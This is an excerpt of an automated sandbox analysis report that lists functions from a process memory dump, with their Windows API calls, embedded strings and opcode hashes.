                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CurrentEnterLeaveLoadStringThreadwsprintf
                                                                                                                        • String ID: #%d
                                                                                                                        • API String ID: 3162899704-1734759437
                                                                                                                        • Opcode ID: 727e39706168a952005ef29b10ea52a0f26648bcd26809d2c3d312330b21f413
                                                                                                                        • Instruction ID: b5ef39f87f2e375f50fdaacde5c1b8959b1faadfe20f7c6e548a2d0c734d5fc8
                                                                                                                        • Opcode Fuzzy Hash: 727e39706168a952005ef29b10ea52a0f26648bcd26809d2c3d312330b21f413
                                                                                                                        • Instruction Fuzzy Hash: 1BE092313003147BC6302BA69C19FABBF9CDF91B94F000066F608D71A2E974A541C3E8
                                                                                                                        Function 00B0C3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,ConvertStringSidToSidW), ref: 00B0C3B4
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0C3D5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: ConvertStringSidToSidW
                                                                                                                        • API String ID: 199729137-806449257
                                                                                                                        • Opcode ID: 58b75471c3c78c4a52c9aa1ac32fa8a5de19ad7e825216d4804e69264c273f22
                                                                                                                        • Instruction ID: bd1626a62a0493af359f59ebff643a2269c87d3a8c230fc98741611c6d6b93af
                                                                                                                        • Opcode Fuzzy Hash: 58b75471c3c78c4a52c9aa1ac32fa8a5de19ad7e825216d4804e69264c273f22
                                                                                                                        • Instruction Fuzzy Hash: A2E06532A502245BC720DFA4D844A57BBFCEB64711F00855BF98597291C6B4E844CBD0
                                                                                                                        Function 00B329B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,IsWow64Process), ref: 00B329C4
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B329E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: IsWow64Process
                                                                                                                        • API String ID: 199729137-777008139
                                                                                                                        • Opcode ID: 7642965e1559ba12aa45dd5ea0f5438a5a0608ce052ba06df3e7b9009b00db45
                                                                                                                        • Instruction ID: 766b55d1975778147d33870dd2586b7ed80567de0d660092534a84f8d8c4560e
                                                                                                                        • Opcode Fuzzy Hash: 7642965e1559ba12aa45dd5ea0f5438a5a0608ce052ba06df3e7b9009b00db45
                                                                                                                        • Instruction Fuzzy Hash: 7DE06532A412245BC7609F94D944A57B7DCFB54B11F00552AF98597640CAB4F800CBE0
                                                                                                                        Function 00B120C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 00B120D4
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B120F1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: GetDpiForWindow
                                                                                                                        • API String ID: 199729137-4136707520
                                                                                                                        • Opcode ID: 59ed04e3844f37e59b89346a1eb341be00200066b1073d49ae5b35ed1f662fb6
                                                                                                                        • Instruction ID: 1dde7762bd71468a591b27fe1ab7cb97690a12a672c0f5ab4b68df0eed5be7be
                                                                                                                        • Opcode Fuzzy Hash: 59ed04e3844f37e59b89346a1eb341be00200066b1073d49ae5b35ed1f662fb6
                                                                                                                        • Instruction Fuzzy Hash: F7E01B729403145FC7209BA9D808A56F7DCEB14755F00456BE545D7680D5B9A850CF94
                                                                                                                        Function 00B4C37E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: NameName::
                                                                                                                        • String ID: {flat}
                                                                                                                        • API String ID: 1333004437-2606204563
                                                                                                                        • Opcode ID: e809ec085fa8b0c15f2ba3c1202360c350c728643dbf6ddc4ba86ac4de8b3b32
                                                                                                                        • Instruction ID: c36d9248a2fde0a429340d749c45268afb389e58804139975de42ed0bb8f13a8
                                                                                                                        • Opcode Fuzzy Hash: e809ec085fa8b0c15f2ba3c1202360c350c728643dbf6ddc4ba86ac4de8b3b32
                                                                                                                        • Instruction Fuzzy Hash: 24F01572149248AFCB10DF58D846AA83FE1EB45B51F098089E54C0F3A6CB71DA41EB95
                                                                                                                        Function 00B12100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 00B12111
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B12127
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: GetDpiForSystem
                                                                                                                        • API String ID: 199729137-3023621526
                                                                                                                        • Opcode ID: 286e6bd60ee85d1dcc61e3cf882c431937bea8823c9d2500890841e2dfa5db9b
                                                                                                                        • Instruction ID: 17081e94a8caf27c1d6187d3b017023b2d8e23f35cef335fd49121cc3071d914
                                                                                                                        • Opcode Fuzzy Hash: 286e6bd60ee85d1dcc61e3cf882c431937bea8823c9d2500890841e2dfa5db9b
                                                                                                                        • Instruction Fuzzy Hash: 65E0EC31D45624ABCB609FB8B8487C6B7E8EF08711F01459AE585E7780CBB4A890CB90
                                                                                                                        Function 00B046A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B046C9
                                                                                                                        Strings
                                                                                                                        • m_hKey != NULL, xrefs: 00B046B5
                                                                                                                        • e:\nsmsrc\nsm\1410\1410\ctl32\RegKey.cpp, xrefs: 00B046B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Delete
                                                                                                                        • String ID: e:\nsmsrc\nsm\1410\1410\ctl32\RegKey.cpp$m_hKey != NULL
                                                                                                                        • API String ID: 1035893169-214662663
                                                                                                                        • Opcode ID: e2e9a5ff22c4391083af2876cd31d76a3fff8e04a2974006943db67eb4af5282
                                                                                                                        • Instruction ID: db9184d181ca69a24e1507100ceac3d5b9253bf6a322a708979d2f161729bc4c
                                                                                                                        • Opcode Fuzzy Hash: e2e9a5ff22c4391083af2876cd31d76a3fff8e04a2974006943db67eb4af5282
                                                                                                                        • Instruction Fuzzy Hash: 26D05B75664314ABD3106A54DC11E6277DCEB14750F0001B5FD45561D1EBF5D840CF94
                                                                                                                        Function 00AFC5B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: ipc %s@%u$no error
                                                                                                                        • API String ID: 2111968516-3872069982
                                                                                                                        • Opcode ID: 1523ca81058c4bd83293f26f2c539e90fcb5d1f72ef64b53bb07de31327b0dcd
                                                                                                                        • Instruction ID: 78589536741c5ffb84ac1e7f365da590103e8df479ff52babedbb073f37d7b98
                                                                                                                        • Opcode Fuzzy Hash: 1523ca81058c4bd83293f26f2c539e90fcb5d1f72ef64b53bb07de31327b0dcd
                                                                                                                        • Instruction Fuzzy Hash: 8FE012B114030957D3109B99C804B727BDCFB64714F04807BF959AB341E6BAE8118764
                                                                                                                        Function 00B24250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,True,?), ref: 00B24270
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfileStringWrite
                                                                                                                        • String ID: False$True
                                                                                                                        • API String ID: 390214022-1895882422
                                                                                                                        • Opcode ID: e52008fc43a8658c70e5521e3fcc6ae586e9276f55e419f02e7289a177e3411f
                                                                                                                        • Instruction ID: 62d8784810894bb0271cb83da9bdff689c1438306e9700903b2f5d122ede5486
                                                                                                                        • Opcode Fuzzy Hash: e52008fc43a8658c70e5521e3fcc6ae586e9276f55e419f02e7289a177e3411f
                                                                                                                        • Instruction Fuzzy Hash: 14D09E7555910DBFDF00DE88DD48AA733ECE789714F108554F91887650CBB4ED10C7A1
                                                                                                                        Function 00AFB4FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • GetProcAddress("WdfPreDeviceRemove") failed: %d, xrefs: 00AFB505
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_wprintf
                                                                                                                        • String ID: GetProcAddress("WdfPreDeviceRemove") failed: %d
                                                                                                                        • API String ID: 1155858372-3472313902
                                                                                                                        • Opcode ID: 449a66977ac06678471690aac0bcb4fd28e10106dae1c544b203daf069624868
                                                                                                                        • Instruction ID: c423054fc24e109feb03685ecc36daffee104adb05bba2fc01ca4f272409469e
                                                                                                                        • Opcode Fuzzy Hash: 449a66977ac06678471690aac0bcb4fd28e10106dae1c544b203daf069624868
                                                                                                                        • Instruction Fuzzy Hash: E6C01272F4400C9E4E04BBE57C0697E73D8DB84211B6000EAFD0EC5292DD5615144692